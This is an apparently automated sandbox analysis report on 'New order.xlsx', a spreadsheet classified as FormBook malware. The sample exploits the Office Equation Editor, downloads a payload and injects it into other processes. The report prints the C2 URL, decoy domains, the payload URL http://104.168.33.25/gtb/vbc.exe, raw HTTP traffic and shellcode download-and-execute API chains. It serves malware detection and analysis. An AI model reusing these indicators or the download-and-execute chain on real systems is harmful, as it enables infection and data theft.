Windows Analysis Report
New order.xlsx

Overview

General Information

Sample Name: New order.xlsx
Analysis ID: 626188
MD5: 70583aa55602c8ba0a7f85d815cb5806
SHA1: 7123adf1a048a8168457dcb5aaa9fead90e40218
SHA256: 4da5cb33b2f19fc2d80cafe3e9e9f1a7071d65724ea9316c86c1a635105bab44
Tags: FormbookVelvetSweatshopxlsx
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
Injects a PE file into a foreign processes
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Checks if the current process is being debugged
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

AV Detection
barindex
Found malware configuration
Source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.worklifefirewalls.com/m9y5/"], "decoy": ["cryptocurrenciesmarketcaps.com", "legaslktiy3.xyz", "cardhj.com", "zouoolaa.xyz", "yjy888.com", "modernboatsalesnadservice.xyz", "zeirishiyamasaki.com", "jamesture.com", "wwwcharleys.com", "walletsw.com", "mbbpaymentplan.com", "lume24.com", "steelonsite.com", "digihm.solutions", "desertunicorns.com", "marbepay.com", "vvv678.com", "73154.xyz", "qzbozhijy.com", "daometalaunch.com", "asproclub.com", "jobeta.net", "whusab.xyz", "delivery-074812.xyz", "magicportriat.com", "floridacommercialprinting.com", "jogodobicho.top", "acessesiteonline01.online", "lakrkajz.xyz", "medicalmassageofpalmbeaches.com", "trendylifeco.com", "upliftpropertysolutions.com", "discountbestdeals.com", "antoniolorenzo.com", "etheteroad.com", "atukr.icu", "xinli-ac.com", "hhydlxs.com", "megabandar.xyz", "olyards.com", "likeama.com", "homes.equipment", "rscall.center", "mayonline.online", "trq-advisors.com", "growyourown.center", "citzensinfo.com", "modernerkredit.com", "chitbucket.com", "kookpedal.com", "tatahotsauce.com", "steadywoman.com", "rfpconsultants.xyz", "insurancecentral.info", "appalachianfamilies.com", "boywhocode.xyz", "a-superb-us-retro-clothes.fyi", "meandmsjones.online", "pastoreemilio.com", "emprendemente.online", "erminelair.com", "doudou-ssr.net", "credit.cool", "dgengcase.com"]}
Multi AV Scanner detection for submitted file
Source: New order.xlsx Virustotal: Detection: 40% Perma Link
Source: New order.xlsx ReversingLabs: Detection: 34%
Yara detected FormBook
Source: Yara match File source: 6.0.fdvucso.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.fdvucso.exe.120000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.fdvucso.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.fdvucso.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.fdvucso.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.fdvucso.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.0.fdvucso.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.fdvucso.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.1035001898.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1034923412.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1171279737.0000000000130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1171209190.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.984865272.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.982519583.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.1034839631.0000000000080000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.983927373.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1027235424.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.1171353184.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.1015398886.000000000B92E000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Antivirus detection for URL or domain
Source: http://104.168.33.25/gtb/vbc.exe Avira URL Cloud: Label: malware
Multi AV Scanner detection for domain / URL
Source: http://104.168.33.25/gtb/vbc.exe Virustotal: Detection: 13% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\Public\vbc.exe ReversingLabs: Detection: 36%
Machine Learning detection for dropped file
Source: C:\Users\Public\vbc.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 6.0.fdvucso.exe.400000.9.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.2.fdvucso.exe.120000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.fdvucso.exe.400000.7.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.0.fdvucso.exe.400000.5.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 6.2.fdvucso.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Exploits
barindex
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe Jump to behavior
Office equation editor establishes network connection
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Network connect: IP: unknown Port: 80 Jump to behavior
Office Equation Editor has been started
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\lmwlf\ciwera\wcsu\ec524832ab3648f5b1c9c3185cc05774\hsjgbq\tqrenmhx\Release\tqrenmhx.pdb source: vbc.exe, 00000004.00000002.996335800.0000000000789000.00000004.00000001.01000000.00000004.sdmp, fdvucso.exe, 00000005.00000000.977201481.000000000132E000.00000002.00000001.01000000.00000005.sdmp, fdvucso.exe, 00000005.00000002.985046531.000000000132E000.00000002.00000001.01000000.00000005.sdmp, fdvucso.exe, 00000006.00000000.980432583.000000000132E000.00000002.00000001.01000000.00000005.sdmp, svchost.exe, 00000008.00000002.1171414662.000000000023C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1171982272.0000000000D2F000.00000004.10000000.00040000.00000000.sdmp, fdvucso.exe.4.dr, nsbF6CE.tmp.4.dr
Source: Binary string: wntdll.pdb source: fdvucso.exe, fdvucso.exe, 00000006.00000003.984908261.0000000000430000.00000004.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1036425899.0000000000BB0000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1035304413.0000000000A30000.00000040.00000800.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000003.986623998.00000000008A0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.1171527322.0000000000690000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1034856361.0000000000380000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.1171735626.0000000000810000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1036048676.0000000000500000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: fdvucso.exe, 00000006.00000002.1035230712.00000000007B4000.00000004.00000020.00020000.00000000.sdmp, fdvucso.exe, 00000006.00000002.1034825185.0000000000030000.00000040.10000000.00040000.00000000.sdmp
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 4_2_00405D7A
Source: C:\Users\Public\vbc.exe Code function: 4_2_004069A4 FindFirstFileW,FindClose, 4_2_004069A4
Source: C:\Users\Public\vbc.exe Code function: 4_2_0040290B FindFirstFileW, 4_2_0040290B

Software Vulnerabilities
barindex
Shellcode detected
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03660560 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03660560
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036604F3 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_036604F3
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036605C1 ShellExecuteExW,ExitProcess, 2_2_036605C1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03660467 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03660467
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0366044E ExitProcess, 2_2_0366044E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036605DF ExitProcess, 2_2_036605DF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_036605AA ShellExecuteExW,ExitProcess, 2_2_036605AA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03660483 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03660483
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_0366050D URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_0366050D
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: www.insurancecentral.info
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 4x nop then pop ebx 6_2_00407B20
Source: C:\Users\user\AppData\Local\Temp\fdvucso.exe Code function: 4x nop then pop edi 6_2_00417DB6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then pop ebx 8_2_00107B20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 4x nop then pop edi 8_2_00117DB6
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 104.168.33.25:80
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49171 -> 104.168.33.25:80

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: www.insurancecentral.info
Source: C:\Windows\explorer.exe Domain query: www.xinli-ac.com
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.worklifefirewalls.com/m9y5/
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
Source: Joe Sandbox View ASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /m9y5/?3f=ylBe/k3Uhk7dBIeXI//KFRH0TaC7pxYziRrYgQ8MI5uD9iOXGI4rYw0cjZ+4cEk1rP/qTw==&-Z=f4l0drr HTTP/1.1Host: www.xinli-ac.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 13 May 2022 15:21:05 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Fri, 13 May 2022 09:01:34 GMTETag: "43da0-5dee0ebd81a80"Accept-Ranges: bytesContent-Length: 277920Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a8 21 60 47 ec 40 0e 14 ec 40 0e 14 ec 40 0e 14 2f 4f 51 14 ee 40 0e 14 ec 40 0f 14 49 40 0e 14 2f 4f 53 14 e3 40 0e 14 b8 63 3e 14 e0 40 0e 14 2b 46 08 14 ed 40 0e 14 52 69 63 68 ec 40 0e 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 a9 9a 4f 61 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 68 00 00 00 12 3a 00 00 08 00 00 46 36 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 a0 3b 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 90 3b 00 50 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c4 67 00 00 00 10 00 00 00 68 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9a 13 00 00 00 80 00 00 00 14 00 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 eb 39 00 00 a0 00 00 00 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 00 01 00 00 90 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 50 0a 00 00 00 90 3b 00 00 0c 00 00 00 86 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /gtb/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.33.25Connection: Keep-Alive
Contains functionality to download and execute PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Code function: 2_2_03660560 URLDownloadToFileW,ShellExecuteExW,ExitProcess, 2_2_03660560
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: unknown TCP traffic detected without corresponding DNS query: 104.168.33.25
Source: EQNEDT32.EXE, 00000002.00000002.966815711.00000000005F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: EQNEDT32.EXE, 00000002.00000002.966815711.00000000005F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: EQNEDT32.EXE, 00000002.00000002.966770565.0000000000594000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.168.33.25/gtb/vbc.exe
Source: EQNEDT32.EXE, 00000002.00000002.966741326.0000000000554000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://104.168.33.25/gtb/vbc.exehhC:
Source: EQNEDT32.EXE, 00000002.00000002.967017696.0000000003660000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://104.168.33.25/gtb/vbc.exej
Source: explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com
Source: explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000000.965645699.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000002.996078709.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000007.00000000.1049037766.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000007.00000000.1023300017.0000000006450000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://servername/isapibackend.dll
Source: explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: explorer.exe, 00000007.00000000.1049037766.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 00000007.00000000.1001996367.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.989934205.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016083299.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1048485092.0000000000335000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3
Source: explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.hotmail.com/oe
Source: explorer.exe, 00000007.00000000.994123651.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1051510306.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.icra.org/vocabulary/.
Source: explorer.exe, 00000007.00000000.1007101672.00000000046D0000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: explorer.exe, 00000007.00000000.998621484.00000000077C9000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://www.mozilla.com0
Source: explorer.exe, 00000007.00000000.993234664.0000000003B10000.00000002.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000007.00000000.999392147.00000000084C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014603671.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992542708.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000007.00000000.1025885348.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999748239.0000000008617000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014603671.0000000008617000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner1SPS0
Source: explorer.exe, 00000007.00000000.999886715.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014689311.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999403275.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.990012033.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1014285253.00000000084D2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1002158677.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1025987393.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1016145834.00000000003A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
